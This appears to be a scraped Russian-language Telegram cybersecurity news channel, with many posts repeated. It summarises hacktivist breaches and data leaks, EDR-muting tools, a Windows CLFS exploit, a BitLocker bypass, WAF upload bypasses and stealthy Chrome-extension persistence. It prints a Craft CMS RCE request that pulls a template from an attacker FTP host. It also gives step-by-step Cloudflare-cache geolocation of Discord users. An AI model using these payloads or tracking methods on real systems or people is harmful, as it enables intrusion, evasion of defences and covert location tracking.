Биржа госзакупок "Росэлторг" недоступна уже неделю
Пока разгневанные менеджеры штурмуют комментарии официального канала с требованием "вернуть доступ" и отправляют массовые жалобы в ФАС, владельцы пытаются замолчать очевидное и на протяжении уже нескольких дней повторяют мантру о "внеплановых работах".
Тем временем канал Yellow Drift "успокаивает" пострадавших
Вместе с посланием хакеры приложили пруфы взлома в виде скриншотов скомпрометированного домена. По их словам, им удалось уничтожить 550 Тб данных, вместе с бэкапами.
Пока разгневанные менеджеры штурмуют комментарии официального канала с требованием "вернуть доступ" и отправляют массовые жалобы в ФАС, владельцы пытаются замолчать очевидное и на протяжении уже нескольких дней повторяют мантру о "внеплановых работах".
Тем временем канал Yellow Drift "успокаивает" пострадавших
Молчание порождает вопросы, вымыслы и панику. А это никак не входило в наши планы. Наша цель, наоборот, четко прояснить где чье место и как работают причинно-следственные связи. Поддерживаете тиранию и спонсируете войны, готовьтесь возвращаться в каменный век.
Поясняем, Росэлторг не проводит временных технических работ. Росэлторг расхлебывает последствия ночной атаки и пытается восстановить 550 Тб утраченных данных: сервера, бэкапы, почты, сертификаты, сайт и прочую инфраструктуру федеральной площадки.
Предлагаем в освободившееся время от участия в торгах, подачи заявок и подготовки тендеров поразмышлять над жизнью. Гляди, может захочется что-то да и поменять в ней
Вместе с посланием хакеры приложили пруфы взлома в виде скриншотов скомпрометированного домена. По их словам, им удалось уничтожить 550 Тб данных, вместе с бэкапами.
Записи докладов с конференции Chaos Communication Congress, которая прошла в Германии с 27-30 декабря.
— Dude, Where's My Crypto? - Real World Impact of Weak Cryptocurrency Keys
— OMG WTF SSO - A beginner's guide to SSO (mis)configuration
— Attack Mining: How to use distributed sensors to identify and take down adversaries
— Hacking Life: How to decode and manipulate biological cells with AI
— Vulnerability management with DefectDojo
— Can We Find Beauty in Tax Fraud?
— we made a globally distributed DNS network for shits and giggles
— Dialing into the Past: RCE via the Fax Machine – Because Why Not?
— Security Nightmares
— What's inside my train ticket?
Всего больше 200 (!) видео, полный список тут.
— Dude, Where's My Crypto? - Real World Impact of Weak Cryptocurrency Keys
— OMG WTF SSO - A beginner's guide to SSO (mis)configuration
— Attack Mining: How to use distributed sensors to identify and take down adversaries
— Hacking Life: How to decode and manipulate biological cells with AI
— Vulnerability management with DefectDojo
— Can We Find Beauty in Tax Fraud?
— we made a globally distributed DNS network for shits and giggles
— Dialing into the Past: RCE via the Fax Machine – Because Why Not?
— Security Nightmares
— What's inside my train ticket?
Всего больше 200 (!) видео, полный список тут.
burpference
Мощный апгрейд для Burp Suite — расширение собирает все In-Scope ссылки из истории запросов и отправляет их в LLM, чтобы тот помогал находить уязвимости.
— поддерживает Ollama, Anthropic, OpenAI, HuggingFace
— можно настроить отправку только в локальную модель
Расширение разработала команда Dreadnode, с одним из ресерчеров которой пару дней назад вышел подкаст от OWASP.
Мощный апгрейд для Burp Suite — расширение собирает все In-Scope ссылки из истории запросов и отправляет их в LLM, чтобы тот помогал находить уязвимости.
— поддерживает Ollama, Anthropic, OpenAI, HuggingFace
— можно настроить отправку только в локальную модель
Расширение разработала команда Dreadnode, с одним из ресерчеров которой пару дней назад вышел подкаст от OWASP.
GitHub
GitHub - dreadnode/burpference: A research project to add some brrrrrr to Burp
A research project to add some brrrrrr to Burp. Contribute to dreadnode/burpference development by creating an account on GitHub.
Доклады с Objective by the Sea.
— Sweet QuaDreams or Nightmare before Christmas? Dissecting an iOS 0-Day
— macOS Stealers: Stealing Your Coins, Cookies and Keychains
— Unraveling the iPhone’s Baseband Architecture to Defend Against Cellular Attacks
— Swift Reversing in 2024 - It's Not So Bad :)
— Stealer Crossing: New Horizons
— Patch Different on *OS"
— Mach-O in Three Dimensions
— Endless Exploits: The Saga of a macOS Vulnerability Exploited Seven Times
— Broken isolation: Draining your Credentials from Popular macOS Password Managers
— iDecompile: Writing a Decompiler for iOS Applications
— How to Use ML to Detect Bad?
— Unraveling Time: Understanding Time Formats in iOS Sysdiagnose for Sec Forensics
— Triangulating TrueType Fonts On macOS: Reconstructing CVE-2023-41990
— Apple's Not So Rapid Security Response
— iPhone Backup Forensics
— A Better Way, YARA-X, Mach-O Feature Extraction, and Malware Similarity
— Tripwires in the Dark: Developing Behavior Detections for macOS
— Mac, Where’s my Bootstrap? What is the Bootstrap Server & How Can U Talk To It?
— From Theory to Practise - Let’s find an iOS Commercial Spyware Sample
— A Little Less Malware, A Little More Context: Using LLMs to Detect Malicious macOS Activity
— Unveiling the Apple CVE-2024-40834 - A 'shortcut' to the Bypass Road
— Mirror Mirror: Restoring Reflective Code Loading on macOS
Все видео в одном плейлисте собраны тут.
Objective by the Sea - единственная в мире конференция по безопасности, ориентированная на Apple, которая объединяет лучших в мире исследователей безопасности Apple и страстных пользователей Apple.
— Sweet QuaDreams or Nightmare before Christmas? Dissecting an iOS 0-Day
— macOS Stealers: Stealing Your Coins, Cookies and Keychains
— Unraveling the iPhone’s Baseband Architecture to Defend Against Cellular Attacks
— Swift Reversing in 2024 - It's Not So Bad :)
— Stealer Crossing: New Horizons
— Patch Different on *OS"
— Mach-O in Three Dimensions
— Endless Exploits: The Saga of a macOS Vulnerability Exploited Seven Times
— Broken isolation: Draining your Credentials from Popular macOS Password Managers
— iDecompile: Writing a Decompiler for iOS Applications
— How to Use ML to Detect Bad?
— Unraveling Time: Understanding Time Formats in iOS Sysdiagnose for Sec Forensics
— Triangulating TrueType Fonts On macOS: Reconstructing CVE-2023-41990
— Apple's Not So Rapid Security Response
— iPhone Backup Forensics
— A Better Way, YARA-X, Mach-O Feature Extraction, and Malware Similarity
— Tripwires in the Dark: Developing Behavior Detections for macOS
— Mac, Where’s my Bootstrap? What is the Bootstrap Server & How Can U Talk To It?
— From Theory to Practise - Let’s find an iOS Commercial Spyware Sample
— A Little Less Malware, A Little More Context: Using LLMs to Detect Malicious macOS Activity
— Unveiling the Apple CVE-2024-40834 - A 'shortcut' to the Bypass Road
— Mirror Mirror: Restoring Reflective Code Loading on macOS
Все видео в одном плейлисте собраны тут.
YouTube
OBTS v7: Sweet QuaDreams or Nightmare before Christmas? Dissecting an iOS 0-Day. Marczak & Fossaceca
Slides: https://objectivebythesea.org/v7/talks/OBTS_v7_cFossaceca_bMarczak.pdf
Talk Description:
Not quite nation states but not quite independent corporations, “private sector offensive actors” (PSOAs) have become one of the latest sophisticated threats.…
Talk Description:
Not quite nation states but not quite independent corporations, “private sector offensive actors” (PSOAs) have become one of the latest sophisticated threats.…
Агентство Национальной Безопасности делится курсами, причем бесплатно.
Есть инициатива NCAE-C, в рамках которой АНБ поддерживает лучшие вузы, которые делают бесплатный и открытый контент по кибербезу.
Курсов много:
— Software Reverse Engineering
— Zero Trust Security
— Incident Response
— Cybersecurity for Autonomous Vehicles
— Generative AI in Cybersecurity
— Industrial Control Systems (ICS)-Renewable Energy (RE) Security
— Blockchain and Cybersecurity
— Network Penetration Testing
— Digital Forensics
— Operating System Hardening
Всего более 850 модулей.
Есть инициатива NCAE-C, в рамках которой АНБ поддерживает лучшие вузы, которые делают бесплатный и открытый контент по кибербезу.
Курсов много:
— Software Reverse Engineering
— Zero Trust Security
— Incident Response
— Cybersecurity for Autonomous Vehicles
— Generative AI in Cybersecurity
— Industrial Control Systems (ICS)-Renewable Energy (RE) Security
— Blockchain and Cybersecurity
— Network Penetration Testing
— Digital Forensics
— Operating System Hardening
Всего более 850 модулей.
Forwarded from S.E.Book
- SAML Enumeration;
- Subdomain Tenant Discovery;
- Example: BambooHR (Subdomain Discovery);
- Slug Tenant Enumeration;
- DNS Reconnaissance;
- Username Enumeration;
- Consent Phishing;
- Poisoned Tenants;
- SAMLjacking;
- Account Ambushing;
- Credential Stuffing;
- App Spraying;
- IM Phishing;
- IM User Spoofing;
- nOAuth;
- MFA Fatigue;
- Device Code Phishing;
- Hijack OAuth Flows;
- AiTM Phishing;
- Device Enrollment;
- Ghost Logins;
- MFA Downgrade;
- Guest Access Abuse;
- Shadow Workflows;
- OAuth Tokens;
- Client-side App Spoofing;
- API Keys;
- OAuth Tokens;
- Evil Twin Integrations;
- Link Backdooring;
- Abuse Existing OAuth Integrations;
- Malicious Mail Rules;
- Password Scraping;
- API Secret Theft;
- App Directory Lookup;
- Link Backdooring;
- Abuse Existing OAuth Integrations;
- API Secret Theft;
- Webhooks;
- Shadow Workflows.
https://blog.redteamguides.com/saas-security-playbook
#SaaS
Please open Telegram to view this post
VIEW IN TELEGRAM
Cybred
EDRSilencer EDRSilencer — "убийца EDR", как FireBlock от MdSec, но опенсорсный и бесплатный. Полностью отключает отправку каких-либо событий EDR с помощью легитимного WFP API в Windows. Список средств защиты, которые перестанут "отстукивать": — Microsoft…
EDRPrison — апгрейд EDRSilencer и других схожих утилит
В отличие от предшественников, EDRPrison:
— вместо добавления статических фильтров WFP, использует динамические на основе содержимого пакетов процесса
— избегает получения доступа к дескрипторам процессов или исполняемых файлов EDR, что снижает риск обнаружения и вмешательства в их работу
— загружая легитимный драйвер WFP callout, расширяет свои возможности, оставаясь при этом в рамках безобидного профиля.
Иными словами, теперь нет ограниченного списка поддерживаемых EDR, — блокируется все.
Подробный ресерч: EDRPrison: Borrow a Legitimate Driver to Mute EDR Agent
В отличие от предшественников, EDRPrison:
— вместо добавления статических фильтров WFP, использует динамические на основе содержимого пакетов процесса
— избегает получения доступа к дескрипторам процессов или исполняемых файлов EDR, что снижает риск обнаружения и вмешательства в их работу
— загружая легитимный драйвер WFP callout, расширяет свои возможности, оставаясь при этом в рамках безобидного профиля.
Иными словами, теперь нет ограниченного списка поддерживаемых EDR, — блокируется все.
Подробный ресерч: EDRPrison: Borrow a Legitimate Driver to Mute EDR Agent
GitHub
GitHub - senzee1984/EDRPrison: Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry
Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry - senzee1984/EDRPrison
2
Forwarded from Life-Hack - Хакер
Наш бесплатный курс "Тестирование на проникновение" подошел к концу. Вот полный список статей, которые помогут вам начать свой путь в #Pentest.
• Моделирование атаки - тестрирование на проникновение.
• Основные этапы тестирования.
• Сбор информации: 1 Часть.
• Сбор информации: 2 Часть.
• Сбор информации: 3 Часть.
• Обнаружение уязвимостей.
• Подбор паролей.
• Обратные оболочки и полезные нагрузки.
• Эксплуатация уязвимостей: 1 Часть.
• Эксплуатация уязвимостей: 2 Часть.
• Уклонение от средств защиты: 1 Часть.
• Уклонение от средств защиты: 2 Часть.
• Уклонение от средств защиты: 3 Часть.
• С2 (Command and Control) сервер.
• Основы Active Directory: 1 Часть.
• Основы Active Directory: 2 Часть.
• Kerberos, NTLM, DNS, LDAP.
• Пользовательские и машинные учетные записи.
• Права и привилегии в Active Directory.
• Небезопасные права доступа ACL.
• Active Directory Domain Enumeration
• Bloodhound
• AS-REP Roasting
• Kerberoasting
• Неограниченное делегирование.
• Ограниченное делегирование.
• Ограниченное делегирование на основе ресурсов.
• DCShadow.
• Pass-the-hash
• Password Spray
• Windows Server Update Services (WSUS)
• System Center Configuration Manager (SCCM)
• Взлом MSSQL
• Responder
• Netexec
• Крадем учетные данные Windows
• Zerologon
• PetitPotam
• Skeleton Key
• RouterSploit
• Получение DA через принтер
• DCSync
• SIDHistory
• AdminSDHolder
• Silver Ticket
• Golden Ticket
• Diamond Ticket
• Sapphire Ticket
Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!
#статья@haccking #обучениеPentest@haccking #AD
LH | Новости | Курсы | OSINT
• Моделирование атаки - тестрирование на проникновение.
• Основные этапы тестирования.
• Сбор информации: 1 Часть.
• Сбор информации: 2 Часть.
• Сбор информации: 3 Часть.
• Обнаружение уязвимостей.
• Подбор паролей.
• Обратные оболочки и полезные нагрузки.
• Эксплуатация уязвимостей: 1 Часть.
• Эксплуатация уязвимостей: 2 Часть.
• Уклонение от средств защиты: 1 Часть.
• Уклонение от средств защиты: 2 Часть.
• Уклонение от средств защиты: 3 Часть.
• С2 (Command and Control) сервер.
• Основы Active Directory: 1 Часть.
• Основы Active Directory: 2 Часть.
• Kerberos, NTLM, DNS, LDAP.
• Пользовательские и машинные учетные записи.
• Права и привилегии в Active Directory.
• Небезопасные права доступа ACL.
• Active Directory Domain Enumeration
• Bloodhound
• AS-REP Roasting
• Kerberoasting
• Неограниченное делегирование.
• Ограниченное делегирование.
• Ограниченное делегирование на основе ресурсов.
• DCShadow.
• Pass-the-hash
• Password Spray
• Windows Server Update Services (WSUS)
• System Center Configuration Manager (SCCM)
• Взлом MSSQL
• Responder
• Netexec
• Крадем учетные данные Windows
• Zerologon
• PetitPotam
• Skeleton Key
• RouterSploit
• Получение DA через принтер
• DCSync
• SIDHistory
• AdminSDHolder
• Silver Ticket
• Golden Ticket
• Diamond Ticket
• Sapphire Ticket
Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!
#статья@haccking #обучениеPentest@haccking #AD
LH | Новости | Курсы | OSINT
Ростелеком взломан
Хакеры из Silent Crow, которые в прошлый раз вынесли Росреестр, поделились своими новыми достижениями.
В процессе выгрузки данных они были замечены местным SOC, который попытался несколько раз выбить из компании, но его попытки оказались тщетными.
В данный момент был опубликован только один дамп, в которой входит 154 тыс. уникальных адресов почты и 101 тыс. уникальных номеров телефонов. Но сегодня будут также опубликованы и другие дампы.
Подводя итоги, Silent Crow призывают ожидать новые сливы.
Хакеры из Silent Crow, которые в прошлый раз вынесли Росреестр, поделились своими новыми достижениями.
Пора подвести итоги нашего недавнего приключения в сетях одной из крупнейших компаний РФ — "Ростелеком". Да, мы были там достаточно долго, вынесли прилично, и теперь делимся с вами некоторыми артефактами.
В процессе выгрузки данных они были замечены местным SOC, который попытался несколько раз выбить из компании, но его попытки оказались тщетными.
Сразу хотим выразить "респект" отделу информационной безопасности Ростелекома. Эти ребята пытались выбить нас из сети четыре раза. Работа SOC была захватывающей, но бессмысленной. На второй месяц мы уже чувствовали себя у них штатными сотрудниками.
В данный момент был опубликован только один дамп, в которой входит 154 тыс. уникальных адресов почты и 101 тыс. уникальных номеров телефонов. Но сегодня будут также опубликованы и другие дампы.
Сегодня мы сольем несколько ресурсов, а именно базу данных "Закупки ПАО Ростелеком", базу данных заявок клиентов с основного сайта "ПАО Ростелеком" — номера телефонов, адреса, запросы, и, конечно, привычные: "Срочно почините интернет!", который всё равно тормозит.
Подводя итоги, Silent Crow призывают ожидать новые сливы.
Ожидайте интересный новостей, следующий слив будет крупным.
CVE-2024-49138-POC
Tested on Windows 11 23h2.
❗️ CVE-2024-49138 is an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver, potentially allowing attackers to gain unauthorized access to system resources.
This vulnerability can be exploited by crafting malicious CLFS log files, enabling attackers to execute privileged actions within the operating system.
Tested on Windows 11 23h2.
Daily CyberSecurity
Zero-Day Vulnerability in Windows Exploited: CVE-2024-49138 PoC Code Released
Security researcher MrAle_98 recently published a proof-of-concept (PoC) exploit for a zero-day vulnerability, CVE-2024-49138. This flaw, which affects the Windows Common Log File System (CLFS) Dr…
Forwarded from елуп
Интерн-шитпостер нашёл критическую уязвимость, которую не замечали больше 15 лет. Вот хронология этой истории:
> В компании, о которой пойдёт речь, есть сервис с древней системой аутентификации, которую никто не трогает, потому что она написана на COBOL. Это древний язык программирования, который используют с 1959 года. Последний человек, который понимал, что там происходит, уехал в Перу проводить занятия по йоге
> Стажёр, который пришёл в компанию на лето, посчитал, что его старшие коллеги оставляют слишком скучные описания коммитов, и решил их разнообразить
> Сначала он оставлял весёлые описания коммитов в более свежих кодовых базах. Вот примеры его пометок:
// This function is older than me and probably pays taxes
// TODO: Ask if this while loop has health insurance
// Here lies Sarah's hopes and dreams (2019-2022), killed by this recursive call
> Но затем он добрался до той самой системы аутентификации и оставил там такие пометки:
// yo why this token validation looking kinda thicc though
// fr fr no cap this base64 decode bussin
// wait... hold up... this ain't bussin at all
> В итоге этот интерн нашёл уязвимость в проверке токенов, которая была там с первого срока Обамы, и отправил тикет в Jira с подписью: Auth be acting mad sus rn no cap frfr (Critical Security Issue)
> Теперь сотрудникам компании придётся объяснять, почему в их квартальном аудите безопасности есть слова no cap frfr, а интерн получит приглашение устроиться на постоянную основу
Небольшая сноска, чтобы разобраться с зумерскими сокращениями:
• thicc — сочная/толстая попа
• fr — for real, реально
• no cap — не пизжу, правда
• bussin — пиздато
• sus — подозрительно
• rn — прямо сейчас
> В компании, о которой пойдёт речь, есть сервис с древней системой аутентификации, которую никто не трогает, потому что она написана на COBOL. Это древний язык программирования, который используют с 1959 года. Последний человек, который понимал, что там происходит, уехал в Перу проводить занятия по йоге
> Стажёр, который пришёл в компанию на лето, посчитал, что его старшие коллеги оставляют слишком скучные описания коммитов, и решил их разнообразить
> Сначала он оставлял весёлые описания коммитов в более свежих кодовых базах. Вот примеры его пометок:
// This function is older than me and probably pays taxes
// TODO: Ask if this while loop has health insurance
// Here lies Sarah's hopes and dreams (2019-2022), killed by this recursive call
> Но затем он добрался до той самой системы аутентификации и оставил там такие пометки:
// yo why this token validation looking kinda thicc though
// fr fr no cap this base64 decode bussin
// wait... hold up... this ain't bussin at all
> В итоге этот интерн нашёл уязвимость в проверке токенов, которая была там с первого срока Обамы, и отправил тикет в Jira с подписью: Auth be acting mad sus rn no cap frfr (Critical Security Issue)
> Теперь сотрудникам компании придётся объяснять, почему в их квартальном аудите безопасности есть слова no cap frfr, а интерн получит приглашение устроиться на постоянную основу
Небольшая сноска, чтобы разобраться с зумерскими сокращениями:
• thicc — сочная/толстая попа
• fr — for real, реально
• no cap — не пизжу, правда
• bussin — пиздато
• sus — подозрительно
• rn — прямо сейчас
Chrome Extension Security
Гайд по безопасности расширений: что, где и как искать
1. Introduction
2. Basics
— Before Start
— Creating Your Own Extension
— Extension Structure
— Storage
— Native Messages
3. Attack
— Exploit addEventListener
— Exploit Messages
— Open Closed Shadow DOM
— Clickjacking
— Unsafe storage to UXSS
4. More
— CVE-2024-10229
Этот сайт — компиляция моих идей и знаний, собранных с начала 2024 года в ходе длительных экспериментов с популярными расширениями.
На сегодняшний день не существует единого ресурса, который бы подробно рассматривал эту важную тему, несмотря на широкое распространение расширений, взаимодействующих с конфиденциальными данными и операциями.
Гайд по безопасности расширений: что, где и как искать
1. Introduction
2. Basics
— Before Start
— Creating Your Own Extension
— Extension Structure
— Storage
— Native Messages
3. Attack
— Exploit addEventListener
— Exploit Messages
— Open Closed Shadow DOM
— Clickjacking
— Unsafe storage to UXSS
4. More
— CVE-2024-10229
Бесплатный курс по форензике
1. Digital Forensics Concepts
2. Working With Virtual Hard Disk
3. Evidence Acquisition Under Windows
4. Working With Ftk Imager
5. Computer Data Representation
6. Working With Files
7. File System And Data Carving
8. Working With Time Zones And Dates
9. Working With Autopsy
10. Writing Forensic Reports
Всего больше 216 лекций.
Мы в C5W стремимся к тому, чтобы все больше людей могли присоединиться к сфере цифровой криминалистики и реагирования на инциденты (DFIR). Поэтому мы рады сообщить, что наш основной курс по DFIR теперь совершенно БЕСПЛАТЕН для всех!
Этот курс призван устранить барьеры и сделать DFIR доступным для студентов, профессионалов и всех, кто интересуется этой интересной областью.
1. Digital Forensics Concepts
2. Working With Virtual Hard Disk
3. Evidence Acquisition Under Windows
4. Working With Ftk Imager
5. Computer Data Representation
6. Working With Files
7. File System And Data Carving
8. Working With Time Zones And Dates
9. Working With Autopsy
10. Writing Forensic Reports
Всего больше 216 лекций.
Как мгновенно определить геолокацию пользователя в Discord, Signal, и многих других сервисах
В этом может помочь Cloudflare — дата-центры которого находятся в более 330 городах мира, в 120+ странах. Сегодня это самый крупный в мире CDN, кэширование которого может выдать пользователя.
Алгоритм на примере Discord выглядит следующим образом:
1. Заходим в Discord, ставим новую аватарку. Она грузится на URL вида
Эта картинка изначально не закэширована ни в одном ДЦ.
2. Заставляем устройство нашей цели загрузить эту картинку. Для этого отправляем любое сообщение, либо запрос в друзья. Пользователю придет уведомление с пушом, в пуше будет предзагружена картинка.
Картинка кэшируется на ближайшем к пользователю ДЦ.
3. Начинаем "простукивать" каждый ДЦ на наличие этой картинки. Это можно сделать с помощью Cloudflare Workers, которые позволяют отправлять запросы из сети Cloudflare, из конкретного ДЦ.
Если сервер ответит со статусом кэширования HIT — это будет значить, что пользователь находится примерно там же, где и сервер Cloudflare.
В чем-то похоже на обычный IP-логгер, но главный плюс в том, что пользователь никуда не нажимает, а его местоположение ликается еще до того, как он разблокирует смартфон.
Способ работал не только с Discord, но и Signal, и Twitter, без взаимодействия с пользователем. Но до тех пор, пока Cloudflare не закрыл третий пункт.
В этом может помочь Cloudflare — дата-центры которого находятся в более 330 городах мира, в 120+ странах. Сегодня это самый крупный в мире CDN, кэширование которого может выдать пользователя.
Алгоритм на примере Discord выглядит следующим образом:
1. Заходим в Discord, ставим новую аватарку. Она грузится на URL вида
https://cdn.discordapp.com/avatars/{user_id}/{avatar_hash}, который использует Cloudflare.Эта картинка изначально не закэширована ни в одном ДЦ.
2. Заставляем устройство нашей цели загрузить эту картинку. Для этого отправляем любое сообщение, либо запрос в друзья. Пользователю придет уведомление с пушом, в пуше будет предзагружена картинка.
Картинка кэшируется на ближайшем к пользователю ДЦ.
3. Начинаем "простукивать" каждый ДЦ на наличие этой картинки. Это можно сделать с помощью Cloudflare Workers, которые позволяют отправлять запросы из сети Cloudflare, из конкретного ДЦ.
Если сервер ответит со статусом кэширования HIT — это будет значить, что пользователь находится примерно там же, где и сервер Cloudflare.
В чем-то похоже на обычный IP-логгер, но главный плюс в том, что пользователь никуда не нажимает, а его местоположение ликается еще до того, как он разблокирует смартфон.
Способ работал не только с Discord, но и Signal, и Twitter, без взаимодействия с пользователем. Но до тех пор, пока Cloudflare не закрыл третий пункт.
1
Cybred
Баг, через который можно угнать все машины от Kia У Kia есть приложение Connect, через которое можно узнать где находится твоя машина, посигналить, а еще открыть ее и завести. Но как оно понимает, что это твоя машина, а не чужая? После того, как ты купил…
Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin
Очередная история про взломы автомобилей с доступом ко всему парку машин.
Исследователь нашел в интернете личный кабинет для владельцев автомобилей Subaru с нюансами:
— чтобы "восстановить" доступ к ЛК владельца любой машины, достаточно указать его почту и новый пароль
— попап с вводом обязательного 2FA можно удалить через код элемента — никакого 2FA на самом деле нет
— дистанционно можно следить за всеми машинами, открывать их и заводить
На скриншоте карта с историей передвижений одного из автомобилистов, которые собирает компания — отказаться от сбора этих данных официально никак нельзя, кроме покупки старой машины.
Очередная история про взломы автомобилей с доступом ко всему парку машин.
Исследователь нашел в интернете личный кабинет для владельцев автомобилей Subaru с нюансами:
— чтобы "восстановить" доступ к ЛК владельца любой машины, достаточно указать его почту и новый пароль
— попап с вводом обязательного 2FA можно удалить через код элемента — никакого 2FA на самом деле нет
— дистанционно можно следить за всеми машинами, открывать их и заводить
На скриншоте карта с историей передвижений одного из автомобилистов, которые собирает компания — отказаться от сбора этих данных официально никак нельзя, кроме покупки старой машины.
samcurry.net
Hacking Subaru: Tracking and Controlling Cars via the STARLINK Admin Panel
On November 20, 2024, Shubham Shah and I discovered a security vulnerability in Subaru’s STARLINK admin panel that gave us unrestricted access to all vehicles and customer accounts in the United States, Canada, and Japan.
How We Cracked a 512-Bit DKIM Key for Less Than $8 in the Cloud
Пошаговый гайд по тому, как на основе слабых (
В статье получили контроль над
Пошаговый гайд по тому, как на основе слабых (
<1024 бит) публичных ключей DKIM восстановить приватные (спойлер: дешево и быстро). Как восстановил — можно начать рассылать письма, как будто ты легитимный владелец чужого домена.В статье получили контроль над
redfin.com и заслали письма нескольким провайдерам, — Yahoo, Mailfence и Tuta приняли подпись.How an obscure PHP footgun led to RCE in Craft CMS
Любой сайт на PHP может быть уязвим к RCE, если использует дефолтный конфиг. Как, например, это случилось в Craft CMS, где приложение, неожиданно для всех, начало принимать аргументы командной строки из GET-параметров
Дело в том, что скрипт, отвечающий за маршрутизацию, при обращении проверял, не переданы ли
Однако благодаря включенной по дефолту фиче
Любой сайт на PHP может быть уязвим к RCE, если использует дефолтный конфиг. Как, например, это случилось в Craft CMS, где приложение, неожиданно для всех, начало принимать аргументы командной строки из GET-параметров
GET /?--templatesPath=ftp://a:a@our.malicious.server:2121/ HTTP/1.1
Host: localhost:8000
...
HTTP/1.1 200 OK
Server: nginx
uid=82(www-data) gid=82(www-data) groups=82(www-data) ArrayДело в том, что скрипт, отвечающий за маршрутизацию, при обращении проверял, не переданы ли
$_SERVER['argc'] и $_SERVER['argv'] (аргументы командной строки). На тот случай, если он запускается кем-то вручную из терминала.Однако благодаря включенной по дефолту фиче
register_argc_argv, эти аргументы можно передать просто GET-параметрами. Что и случилось, — ресерчер передал в качестве --templatesPath путь к шаблону на собственном сервере, а приложение, думая, что этот параметр передан из CLI, подгрузило вредоносный темплейт.www.assetnote.io
How an obscure PHP footgun led to RCE in Craft CMS
Craft CMS is one of the most popular PHP-based CMSes globally, boasting over 150,000 sites worldwide. This blog post details a pre-authentication RCE vulnerability affecting Craft CMS versions below 4.13.1 and 5.5.1.
Windows BitLocker — Screwed without a Screwdriver
Топ-доклад с недавнего 38с3 (о котором я писал тут), — рассказали о самом простом, на сегодняшний день, способе обойти Bitlocker.
Существует атака bitpixie, суть которой проста: вызвать ошибку при загрузке Windows и в режиме восстановления прочитать ключ для расшифровки битлокера, который Bootloader забыл затереть в памяти. Она известна как CVE-2023-24932 уже два года, и Microsoft ее запатчила.
Кроме того, Secure Boot проверяет, чтобы загрузчик был подписан Microsoft, и не дает подсунуть что-то левое. Зато дает возможность даунгрейднуть новую версию загрузчика на уязвимую, и эксплуатировать старый баг с чтением из памяти.
Ничего разбирать не нужно, — достаточно иметь под рукой LAN кабель (чтобы прикинуться TFTP PXE и отправить "апдейт"), второй нотбук (для всех манипуляций), и прямые руки — диск будет расшифрован.
Актуально для многих версий Windows, заканчивая последними сборками Windows 11. Единственное спасение — сложный хотфикс через ручное обновление серта UEFI, — автоматического исправления на сегодня нет.
Топ-доклад с недавнего 38с3 (о котором я писал тут), — рассказали о самом простом, на сегодняшний день, способе обойти Bitlocker.
Ваш ноутбук был украден. Он работает под управлением Windows 11, полностью обновлен, работает со включенным шифрованием устройства (BitLocker) и Secure Boot. Ваши данные в безопасности, верно? Как бы не так!
Существует атака bitpixie, суть которой проста: вызвать ошибку при загрузке Windows и в режиме восстановления прочитать ключ для расшифровки битлокера, который Bootloader забыл затереть в памяти. Она известна как CVE-2023-24932 уже два года, и Microsoft ее запатчила.
Кроме того, Secure Boot проверяет, чтобы загрузчик был подписан Microsoft, и не дает подсунуть что-то левое. Зато дает возможность даунгрейднуть новую версию загрузчика на уязвимую, и эксплуатировать старый баг с чтением из памяти.
Ничего разбирать не нужно, — достаточно иметь под рукой LAN кабель (чтобы прикинуться TFTP PXE и отправить "апдейт"), второй нотбук (для всех манипуляций), и прямые руки — диск будет расшифрован.
Актуально для многих версий Windows, заканчивая последними сборками Windows 11. Единственное спасение — сложный хотфикс через ручное обновление серта UEFI, — автоматического исправления на сегодня нет.
neodyme.io
Windows BitLocker -- Screwed without a Screwdriver
Breaking up-to-date Windows 11 BitLocker encryption -- on-device but software-only
1
Breaking Down Multipart Parsers: File upload validation bypass
Пачка новых обходов на аплоад файлов под популярные балансеры, файерволы и фреймворки.
Все построено на обмане встроенных парсеров.
Why do we need to validate files being uploaded?
Understanding Multipart Form-Data: Specifications and Peculiarities
— What's the Boundary Strings?
— Content-Disposition
— Additional Headers Within Parts
Bypass #0: urlencoded in multipart
Bypass #1: duplicated name parameter
Bypass #1.1: duplicated filename parameter
Bypass #1.2: duplicated Content-Disposition
Bypass #2: breaking the CRLF seuqences
Bypass #3: removing double quotes
Bypass #4: missing closing boundary string
Bypass #5: filename*=utf-8'' in request
⚠️ PHP version in screenshots
Bypass OpenResty Lua multipart parsers
— Duplicated filename parameter
— Breaking CRLF sequence
— Removing doublequotes on filename parameter
Bypass Nodejs and Busboy
Bypass file upload in Python Flask
Bypass FortiWeb WAF
Bypass Barracuda WAF
Bypass HAProxy ACL
— This is the ACL
Bypass AWS WAF, Lambda
ModSecurity Multipart Parser
Conclusions
Пачка новых обходов на аплоад файлов под популярные балансеры, файерволы и фреймворки.
По сути, ни один парсер multipart/form-data не соответствуют спецификации, и когда дело доходит до проверки имен файлов или контента, загружаемого пользователями, всегда есть множество способов обойти проверку.
Все построено на обмане встроенных парсеров.
Why do we need to validate files being uploaded?
Understanding Multipart Form-Data: Specifications and Peculiarities
— What's the Boundary Strings?
— Content-Disposition
— Additional Headers Within Parts
Bypass #0: urlencoded in multipart
Bypass #1: duplicated name parameter
Bypass #1.1: duplicated filename parameter
Bypass #1.2: duplicated Content-Disposition
Bypass #2: breaking the CRLF seuqences
Bypass #3: removing double quotes
Bypass #4: missing closing boundary string
Bypass #5: filename*=utf-8'' in request
⚠️ PHP version in screenshots
Bypass OpenResty Lua multipart parsers
— Duplicated filename parameter
— Breaking CRLF sequence
— Removing doublequotes on filename parameter
Bypass Nodejs and Busboy
Bypass file upload in Python Flask
Bypass FortiWeb WAF
Bypass Barracuda WAF
Bypass HAProxy ACL
— This is the ACL
Bypass AWS WAF, Lambda
ModSecurity Multipart Parser
Conclusions
Sicuranext Blog
Breaking Down Multipart Parsers: File upload validation bypass
TL;DR: Basically, all multipart/form-data parsers fail to fully comply with the RFC, and when it comes to validating filenames or content uploaded by users, there are always numerous ways to bypass validation. We'll test various bypass techniques against…
Silently Install Chrome Extension For Persistence
Преимущества:
— не использует командную строку
— оставляет реестр нетронутым
— может быть установлен с открытым браузером
— стабилен и сохраняет постоянство
research // poc
Я занимаюсь Red Team 10 лет и сегодня расскажу, как мне удалось найти способ максимально скрытно установить расширение для Chrome с обходом всех IOC, известных в настоящее время.
Преимущества:
— не использует командную строку
— оставляет реестр нетронутым
— может быть установлен с открытым браузером
— стабилен и сохраняет постоянство
